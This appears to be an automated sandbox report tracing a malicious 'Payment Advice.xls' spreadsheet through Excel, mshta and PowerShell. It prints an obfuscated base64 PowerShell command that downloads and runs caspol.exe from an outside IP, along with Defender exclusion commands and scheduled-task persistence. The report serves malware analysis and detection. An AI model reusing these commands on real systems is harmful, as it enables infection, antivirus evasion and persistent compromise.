Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~................................s............8.......$.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............\..........................................s............8...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............\..........................................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............\..........................................s............8...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n..................s............8.......2.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............\...............;..........................s............8...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............\...............M..........................s....................l.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............\...............Y..........................s............8...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ .......(.P.............\.......t.......z..........................s............8...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............\.......t..................................s............8...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............$.......t..................................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............$.......t.......&..........................s............x. .............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............$.......t.......8..........................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............$.......t.......D..........................s............x. .............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............$.......t.......V..........................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............$.......t.......b..........................s............x. .............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................a.g.a.i.n...............$.......t.......t..........................s............x. .............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............$.......t..................................s............x. .............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.t..................................s............x. ..... .......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............$.......t..................................s............x. .............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............$.......t..................................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............$.......t..................................s............x. .............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~................................s............x. .....$.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............$.......t..................................s............x. .............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............$.......t..................................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............$.......t..................................s............x. .............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n..................s............x. .....2.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............$.......t.......(..........................s............x. .............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............$.......t.......:..........................s....................l.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............$.......t.......F..........................s............x. .............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ .......(.P.............$.......t.......X..........................s............x. .............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............$.......t.......d..........................s............x. .............................
Source: C:\Windows\SysWOW64\schtasks.exe	Console Write: .................. .............x. .....(.P.............$.......................................................................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................<.......9..........................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................<.......G..........................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................<.......[..........................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................<.......j..........................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................<.......\|..........................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................<..................................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................a.g.a.i.n.......................<..................................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................<..................................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.<..................................s.................... .......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................<..................................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................<..................................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................<..................................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~................................s....................$.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................<..................................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................<.......$..........................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n..................s....................2.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................<.......C..........................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............................V..........................s....................l.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ .......(.P........................................................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................h..................................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................h.......(..........................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................h.......;..........................s............................h...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................h.......G..........................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................h.......`..........................s............................h...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................h.......m..........................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................a.g.a.i.n..........................................................s............................h...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s............................h...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.........7..........................s.................... .......h...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................h.......G..........................s............................h...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................h.......d..........................s............................h...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................h.......p..........................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~................................s....................$.......h...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................h..................................s............................h...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................h..................................s............................h...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................<..................................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n..................s....................2.......h...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................<..................................s............................h...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................<..................................s....................l.......h...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................<..................................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ .......(.P.....................<..................................s............................h...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................<.......(..........................s............................h...............
Source: C:\Windows\SysWOW64\schtasks.exe	Console Write: ......................4.........E.R.R.O.R.:. ...........T.................................................................................4.....
Source: C:\Windows\SysWOW64\schtasks.exe	Console Write: ......................4.........E.R.R.O.(.P.............T...............................................................j.................4.....
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .................P..............0.v.......v..............................................................3......................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................h(........................v.....}..w......v......................1......(.P.....................................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .................P................v.......v.....}..w.............................1......(.P..............3......................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................Cm........................Uk....}..w............\.......................(.P.....................(...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................................}..w..............[.......Uk....`.Z.....(.P.....................................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................Cm........................Uk....}..w............\.......................(.P.....................(...............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................................}..w..............[.......Uk....`.Z.....(.P.....................................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................t.h.a.t. .t.h.e. .p.a.t.h. .i.s. .c.o.r.r.e.c.t. .a.n.d. .t.r.y. .a.g.a.i.n.............N.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1...[.......Uk....`.Z.....(.P............................. .......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................+. .D.e.V.i.C.e.c.R.e.D.e.n.T.I.a.l.d.E.p.L.O.y.m.e.n.t.(.P.............................8.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.(.P.............................8.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................................}..w..............[.......Uk....`.Z.....(.P.....................................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ . . .n.g.). .[.].,. .C.o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...................F.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................................}..w..............[.......Uk....`.Z.....(.P.............................l.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ ...............}..w..............[.......Uk....`.Z.....(.P.....................................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................<.......z..........................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................<..................................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................<..................................s.............................. .............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................<..................................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................<..................................s.............................. .............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................<..................................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................a.g.a.i.n.......................<..................................s.............................. .............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................<..................................s.............................. .............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.<..................................s.................... ......... .............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................`..................................s.............................. .............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................`..................................s.............................. .............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................`..................................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.....3..........................s....................$......... .............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................<.......?..........................s.............................. .............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................<.......R..........................s.............................. .............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................<.......^..........................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n..................s....................2......... .............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................<.......\|..........................s.............................. .............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................<..................................s....................l......... .............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................<..................................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ .......(.P.....................<..................................s.............................. .............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................`..................................s.............................. .............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................<..................................s............................x...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................<..................................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................<..................................s............................x...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................<..................................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................a.g.a.i.n.......................<..................................s............................x...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................<..................................s............................x...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.<..................................s.................... .......x...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................<.......*..........................s............................x...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................<.......B..........................s............................x...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................<.......S..........................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.....e..........................s....................$.......x...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................<.......q..........................s............................x...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................D..................................s............................x...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................D..................................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n..................s....................2.......x...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s............................x...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s....................l.......x...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s............................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ .......(.P........................................................s............................x...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s............................x...............
Source: C:\Windows\SysWOW64\schtasks.exe	Console Write: ......................+.........E.R.R.O.R.:. ...t...............$.........................................................................+.....
Source: C:\Windows\SysWOW64\schtasks.exe	Console Write: ......................+.........E.R.R.O.(.P.....t.......................!...............................................j.........-.......+.....

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: Payment Advice.xls	ReversingLabs: Detection: 21%
Source: Payment Advice.xls	Virustotal: Detection: 25%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe -Embedding
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sYStem32\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe" "PoWeRSheLL.ExE -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment ; iEx($(iEX('[SysteM.TExT.encODInG]'+[cHAR]58+[cHAR]58+'UTF8.GEtSTrINg([sysTem.cOnVERT]'+[cHAR]58+[chAr]58+'FrOMbASe64StrIng('+[chAR]34+'JG56dWNGVUF3ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJlUkRFRklOaVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWlBudFZzUmhBaCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNeWpwcUlrUXdEYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1alFRcFNYb0lXeSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhWXlwdmx5a3BlKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZFhHTSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNRVNwYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV1BmVyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbnp1Y0ZVQXc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzU1L2Nhc3BvbC5leGUiLCIkZU52OkFQUERBVEFcY2FzcG9sLmV4ZSIsMCwwKTtzVGFyVC1TbGVlUCgzKTtpZXggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXGNhc3BvbC5leGUi'+[cHaR]0X22+'))')))"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\fkur3fvp\fkur3fvp.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES1ED7.tmp" "c:\Users\user\AppData\Local\Temp\fkur3fvp\CSC55312E8BACB34CD3B1B97BFED1B34D9.TMP"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Roaming\caspol.exe "C:\Users\user\AppData\Roaming\caspol.exe"
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" -Embedding
Source: C:\Users\user\AppData\Roaming\caspol.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\caspol.exe"
Source: C:\Users\user\AppData\Roaming\caspol.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe"
Source: C:\Users\user\AppData\Roaming\caspol.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rrwscqkDSNwLK" /XML "C:\Users\user\AppData\Local\Temp\tmp9F6B.tmp"
Source: unknown	Process created: C:\Windows\System32\taskeng.exe taskeng.exe {6A6C3D45-060E-4891-98BB-3A2AADA7326E} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1]
Source: C:\Users\user\AppData\Roaming\caspol.exe	Process created: C:\Users\user\AppData\Roaming\caspol.exe "C:\Users\user\AppData\Roaming\caspol.exe"
Source: C:\Windows\System32\taskeng.exe	Process created: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe
Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe"
Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe"
Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rrwscqkDSNwLK" /XML "C:\Users\user\AppData\Local\Temp\tmpBD09.tmp"
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe -Embedding
Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe	Process created: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe "C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe"
Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe	Process created: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe "C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe"
